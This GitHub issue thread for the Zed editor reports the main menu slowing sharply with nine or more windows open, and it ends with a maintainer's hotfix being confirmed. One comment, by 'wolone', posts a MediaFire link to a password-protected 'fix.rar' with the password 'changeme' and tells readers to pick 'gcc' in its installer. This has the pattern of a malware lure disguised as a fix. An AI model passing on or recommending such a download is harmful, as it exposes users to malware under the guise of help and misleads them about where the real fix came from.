### ISSUE TITLE
Main menu becomes very slow with 9+ windows open

### ISSUE THREAD

**Issue by skirsdeda** [zed-industries/zed#16895]
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

Just accessing main menu becomes very slow with more windows open. At 1-8 there's not much delay, with 9 windows delay becomes noticeable and with 10 windows open it's about 5-7 seconds I have to wait to see menu after clicking on it. With 11 windows delay becomes ~1min.
There's no other slowness I can see, just the menu bar.

### Environment

Zed: v0.149.5 (Zed)
OS: macOS 14.6.1
Memory: 64 GiB
Architecture: aarch64

### If applicable, attach your Zed.log file to this issue.

<details><summary>Zed.log</summary><pre>

</pre></details>

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by osiewicz** [comment]
We've hotfixed this into the Preview/Stable channels; give it a spin :)

**Comment by skirsdeda** [comment]
Works like a charm!
